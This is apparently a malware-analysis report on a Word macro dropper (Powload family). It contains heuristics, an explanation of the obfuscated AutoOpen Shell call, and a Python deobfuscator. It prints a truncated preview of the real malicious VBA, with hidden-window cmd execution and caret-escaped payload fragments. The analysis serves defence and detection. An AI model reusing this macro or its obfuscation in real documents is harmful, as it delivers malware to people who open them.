Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an OLE (legacy Word binary) document whose VBA project contains an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. AutoOpen's only real work is a single Shell call, the critical OLE_VBA_SHELL heuristic; everything around it is padding: On Error Resume Next followed by dozens of "Hour x * y" statements on undeclared names, whose results are discarded and whose errors are swallowed. The command handed to Shell is KeyString(0 + 8 + 4 + 8 + 47), i.e. KeyString(67), concatenated with the return values of eight helper Functions (cbMGaUjsAj, irZBLrn, dJwRHjsRcj, CTTESlWL, HwpKXAmui, HZnpzOZr, ENFGBFvHjC and XwkIntoqLFiu), each of which glues short string literals into local variables. dJwRHjsRcj begins with "md" + " /V:/C", and Chr(2 + 5 + 2 + 3 + 22) is Chr(34), a double quote, so the decoded command starts cmd /V:/C"^s^et F^9==... (the KeyString call supplies the leading "c", assuming cbMGaUjsAj and irZBLrn, which are not defined in the visible part of the preview, contribute nothing). The /V: switch enables delayed environment-variable expansion and the ^ characters are cmd.exe escape characters: the classic shape of a caret-obfuscated one-liner that stores its real payload in a variable (here F9) and expands it later. The second Shell argument, 19 - 19, evaluates to 0 (vbHide), so no console window is shown. ClamAV's Doc.Dropper.Powload family name denotes Office documents that drop a PowerShell-based downloader, which is consistent with the above; the preview is truncated before the end of the command, however, so the PowerShell invocation and any download URL are not visible in this report and should be confirmed by decoding the full macros.bas.
Heuristics (6)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Dropper.Powload-6922837-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Powload-6922837-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (2 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |

Two of these need reading with care. The OLE_LEGACY_WORDBASIC_AUTOEXEC description is the heuristic's generic text: it says no modern VBA project was recovered, but in this sample one was (macros.bas under Extracted artifacts), so the marker is the same AutoOpen entry point already reported by OLE_VBA_AUTOOPEN rather than independent evidence. The single extracted URL is the XML namespace identifier for Office Open XML DrawingML, which appears in ordinary documents; it is not an indicator of compromise and says nothing about where the payload is fetched from.
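The decoding described under Malware Insights and the macro heuristics in the table above can be reproduced mechanically. The Python below is an added example written for this page, not the analyzer's code and not part of the sample: it folds VBA line continuations, discards the Hour padding, statically evaluates the string-building Functions (string literals, Chr() and KeyString() with their additive arithmetic, local variables and helper-Function return values), lists auto-exec entry points and Shell statements with their WindowStyle, and strips cmd.exe carets for a readable view. It runs on a constructed, shortened macro modelled on the macros.bas preview rather than on the real artifact. Two things are assumptions, not facts from the page: that Word's KeyString(67) returns "c" (the page supports this only indirectly, through the "md" fragment that follows it), and that stripping carets without regard to cmd.exe quoting rules gives a useful analyst view; it is not what cmd.exe would literally execute.

```python
import re

# Constructed, shortened sample modelled on the extracted macros.bas preview; the real
# artifact is far longer and the tail of its command is not shown in the report.
SAMPLE_VBA = '''Sub AutoOpen()
On _
Error _
Resume _
Next
Hour zbMUu * JZEGP
Shell KeyString(0 + 8 + 4 + 8 + 47) + dJwRHjsRcj + CTTESlWL, 19 - 19
End Sub
Function dJwRHjsRcj()
Kmkcci = "md" + " /V:/C" + Chr(2 + 5 + 2 + 3 + 22) + "^s^et" + " F^9==" + "=^AAgAA"
mFaAPsbw = "^A^A" + "IA^AC^A"
dJwRHjsRcj = Kmkcci + mFaAPsbw
End Function
Function CTTESlWL()
CTTESlWL = "AJ^BwO" + "AkCAt"
End Function
'''

AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "document_open", "workbook_open"}
PROC_RE = re.compile(r"^(Sub|Function)\s+(\w+)\s*\(", re.I)
END_RE = re.compile(r"^End\s+(Sub|Function)\b", re.I)
# Padding: Hour(...) results are discarded and On Error Resume Next hides the errors.
JUNK_RE = re.compile(r"^(Hour\b|On\s+Error\s+Resume\s+Next$)", re.I)
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
SHELL_RE = re.compile(r"^Shell\s+(.+)$", re.I)
TOKEN_RE = re.compile(r'\s*(?:"(?P<str>[^"]*)"|(?P<fn>Chr|KeyString)\((?P<arg>[^)]*)\)'
                      r'|(?P<id>[A-Za-z_]\w*)|\+)\s*')


def fold_continuations(src):
    """Join VBA ' _' line continuations so each statement occupies one line."""
    joined = re.sub(r" _[ \t]*\r?\n[ \t]*", " ", src)
    return [line.strip() for line in joined.splitlines() if line.strip()]


def int_expr(text):
    """Evaluate the +/- integer arithmetic hiding key codes: 0 + 8 + 4 + 8 + 47 -> 67."""
    return sum(-int(n) if s == "-" else int(n) for s, n in re.findall(r"([+-]?)\s*(\d+)", text))


def strip_cmd_carets(command):
    """Readability pass only: each cmd.exe '^' escapes the next character. Quoting rules
    are ignored (a caret inside quotes is literal), so do not treat this as re-execution."""
    return re.sub(r"\^(.)", r"\1", command)


class MacroDeobfuscator:
    """Statically evaluate the string-building procedures of an olevba dump."""

    def __init__(self, vba_source):
        self.procs, self._envs, current = {}, {}, None
        self.shell_calls = []                      # (caller, command, WindowStyle)
        for line in fold_continuations(vba_source):
            m = PROC_RE.match(line)
            if m:
                current = m.group(2)
                self.procs[current] = []
            elif END_RE.match(line):
                current = None
            elif current is not None and not JUNK_RE.match(line):
                self.procs[current].append(line)
        for name in self.procs:
            self._run(name)

    def _eval(self, expr, env):
        """Concatenate literals, Chr()/KeyString() results, locals and Function returns."""
        out, pos = [], 0
        while pos < len(expr):
            m = TOKEN_RE.match(expr, pos)
            if not m:
                raise ValueError(f"unsupported VBA expression near {expr[pos:pos + 20]!r}")
            pos, name = m.end(), m.group("id")
            if m.group("str") is not None:
                out.append(m.group("str"))
            elif m.group("fn"):
                code = int_expr(m.group("arg"))
                # Assumption: Word's KeyString gives the unshifted key for codes 48..90, so
                # KeyString(67) is "c"; other key codes are left symbolic for the analyst.
                ks = chr(code).lower() if 48 <= code <= 90 else f"<KeyString({code})>"
                out.append(chr(code) if m.group("fn") == "Chr" else ks)
            elif name in env:
                out.append(env[name])
            elif name in self.procs:                # a helper Function's return value
                out.append(self._run(name).get(name, ""))
            # Any other name is an undeclared variable: Empty, which adds nothing.
        return "".join(out)

    def _run(self, name):
        """Execute a procedure's assignments once, recording any Shell statement it makes."""
        if name not in self._envs:
            self._envs[name] = env = {}            # registered first so recursion yields ""
            for line in self.procs[name]:
                m = SHELL_RE.match(line)
                if m:
                    args, sep, style = m.group(1).rpartition(",")
                    if not sep:                    # omitted WindowStyle = vbMinimizedFocus
                        args, style = style, "2"
                    self.shell_calls.append((name, self._eval(args, env), int_expr(style)))
                elif ASSIGN_RE.match(line):
                    var, rhs = ASSIGN_RE.match(line).groups()
                    env[var] = self._eval(rhs, env)
        return self._envs[name]


def triage(vba_source):
    """Reproduce the report's macro heuristics and decode the Shell command."""
    d = MacroDeobfuscator(vba_source)
    return {"auto_exec": sorted(p for p in d.procs if p.lower() in AUTO_EXEC),
            "shell_calls": [(c, strip_cmd_carets(cmd), s) for c, cmd, s in d.shell_calls],
            "hidden_window": any(s == 0 for _, _, s in d.shell_calls)}   # 0 = vbHide
```

triage(SAMPLE_VBA) reports AutoOpen as the entry point, the Shell command decoded to cmd /V:/C"set F9===AAgAA... with WindowStyle 0, and hidden_window True. The evaluator raises ValueError on any expression shape it does not model instead of guessing, which is the behaviour you want when a new variant introduces an operator or built-in the page's sample does not use; feeding it the full macros.bas only requires the additional literal fragments that the preview truncates.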
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7439 bytes | 7beb1fdec2869eca13576290d88f6489e40ecf2a080b2f092ae91f536718e704 |
Preview: first 1,000 lines of the extracted script (macros.bas)

```vb
Attribute VB_Name = "zjbIpFtYOJuw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour zbMUu * JZEGP
Hour 64504 / lDMwL
Hour UaKczo / qzUiN
Shell KeyString(0 + 8 + 4 + 8 + 47) + cbMGaUjsAj + irZBLrn + dJwRHjsRcj + CTTESlWL + HwpKXAmui + HZnpzOZr + ENFGBFvHjC + XwkIntoqLFiu, 19 - 19
Hour 75293 / 71178
Hour 57983 / QHsot
Hour tdLnTa * DXOHAZ
End Sub
Attribute VB_Name = "wEKziKaTLSvsiH"
Function dJwRHjsRcj()
On _
Error _
Resume _
Next
Hour 33258 * SNVQi
Hour OTLkk / CTtiAf / 60663 * KCIchM
Kmkcci = "md" + " /V:/C" + Chr(2 + 5 + 2 + 3 + 22) + "^s^et" + " F^9==" + "=^AAgAA" + "I^AA" + "C^A" + "gAAI^A^" + "ACA^g"
Hour 43346 * scHfh
Hour SqYoSD * 32535
Hour bfnLk / lXHKNn
mFaAPsbw = "^A^A" + "IA^AC^A" + "g^AAIA" + "^" + "A" + "C^A" + "g"
Hour 4161 / 66307 / CsIUWm / vipHHs
Hour 66328 * WfLUJK / 62842 / dXwQj
Hour zNlisK * QqjYW * vRoWG * AYUwE
Hour 2918 / wSiPh
Hour PCliP * LWonQ / pmibR * wPaARB
qKUratFa = "^" + "AAI" + "^A" + "^" + "AC^A^g^" + "A" + "AIA^"
Hour NFdjP * ktOrND / YjnHq * 15450
Hour RoFut / dmlncV * BbGzfl / SGSzdz
mGvwHElTL = "0^HA9" + "B" + "^weA^" + "g^G" + "^A^jB" + "A^d" + "^A^E^" + "GAj" + "^B^QfA" + "s^D^" + "ArBQ^YA"
Hour pVzHH / 55596 / khhWI * ILWCnK
Hour KnmKd / MvQjj * 58092 * hrwIl
Hour 20668 * sOAww
Hour Qwhpb / vNUfFK
Hour 30219 * ZQSfA / XMBQz / wBjPdh
JMjfdYAjs = "U^GAyB" + "^" + "g^YA^s^" + "D^" + "A^t^B^Q" + "U^AME" + "^Ak^AAI" + "^A^0" + "^GAlBAd"
Hour 43807 * QTlkW
Hour 4768 * 61504
Hour 39826 / zJzbOV
Hour 60259 / FpjOTi
ARsBiYpU = "^Ak^" + "EA^t^A" + "QZA" + "sG" + "A" + "v^B^g" + "^dA" + "4" + "G^"
dJwRHjsRcj = Kmkcci + mFaAPsbw + qKUratFa + mGvwHElTL + JMjfdYAjs + ARsBiYpU
Hour 38078 * 7359
Hour QZiNnr / izhqE / 22480 / DLntkW
Hour 61048 / 6752
Hour IhZuB * iwjiMQ / 23648 * zFCGlQ
End Function
Function CTTESlWL()
On _
Error _
Resume _
Next
Hour coiQA / nCnfC * fZIjAC / TrjHYO
Hour 80157 / wnhwk
Hour RzJSt / 74051
aLftOcC = "AJ^BwO" + "AkCAt" + "^B^QU^A" + "^M" + "^EA^" + "k" + "A^A^IA" + "^wC" + "AC" + "^B^AS^" + "AIHA^" + "k^A^A^K"
Hour 98313 / KpnEh * 92490 / tawjJC
Hour 30292 / jDwArw
PwXwpLjlnk = "A^" + "UG" + "As" + "^B" + "Q^" + "a^" + "A^" + "Y^E^A^" + "k^B" + "Q^Y^A"
Hour 85535 / TwrTA
Hour imEdo * iqfud
Hour 43049 * iMIsQ
Hour ZrYdd / bWAsoR
Hour OzBaaM * jLsQs * 13106 / qIzbu
tNaKm = "^8" + "^GA" + "s^" + "B^g^b^A" + "cHAv^B"
Hour 34088 / FTjTu
Hour 27137 / qCWSwE
Hour 79491 * mpLRl / LizhzN * 48916
Hour hOohfS / mMYkPl / uiAzN * KJqQK
iIHZGNIUwmm = "ARA^4" + "C^A" + "wBA" + "b^AQHAk" + "^A^we^A" + "^kHA" + "^" + "y^B^AdA" + "^sHApA^" + "Q^a^AQF"
Hour zEuvK / RQjkr * 63119 * SBBPYB
Hour VzblX / zPSHk
Hour BjMPvl * pjjzKo / 67984 / jWZYY
Hour BOiBSC / biFiai
XjWvK = "A^2BA" + "JA^AC" + "Au^B^Q" + "a^A^" + "ACAC" + "B^AS" + "A^"
Hour 3550 / NGUktj / wPEIC / 98294
Hour KAXvw * pPurAj
RMREm = "IH^AkAA" + "KA^g^G^" + "Aj^" + "BQYAU" + "^" + "G" + "AyB^w^" + "bA^" + "Y^"
Hour 57807 / kFBPQl
Hour 65966 * GGUFH / hnSFFj * 72731
Hour 91366 * 6626
PDqwknQ = "GA" + "^7A^wJ" + "^" + "AU^G" + "^A^4^" + "BQZ^A4C" + "^An^" + "A^" + "w" + "^"
Hour 18166 / dNiEO * sSkUS / Bzntt
Hour 77769 / qDAJwZ * 65370 * ZFcmwb
Hour 4930 / anRwQ / 22632 / 99539
bQqzRwwpptn = "K^A^UEA" + "^ZB^QU" + "^A^QC^" + "ArAw" + "^" + "J^" + "A^w" + "^F"
Hour PIXGp / DAXEmq
Hour 11131 * kZMjHo / jjQJqh * nhcAa
Hour KOmqd / KocwHq
Hour oCGUpQ * 21105 * mLWJi / 9377
Hour 76345 / ztMWL * fKwBSG * RjBhN
kZrvIBbcjiX = "An^A^" + "w^KA^" + "MGAp" + "BA^" + "bAIG^A1" + "^B" + "A" + "c^Ao" + "^D" + "A2B^" + "gb" + "A^U^G"
Hour EZPJj * TUlcJE
Hour McDvw * wREBCD / cCzSpP / wlDjji
Hour 10825 * BNEHi
Hour IYbCV / 96434
Hour 79496 / ...
```
(truncated)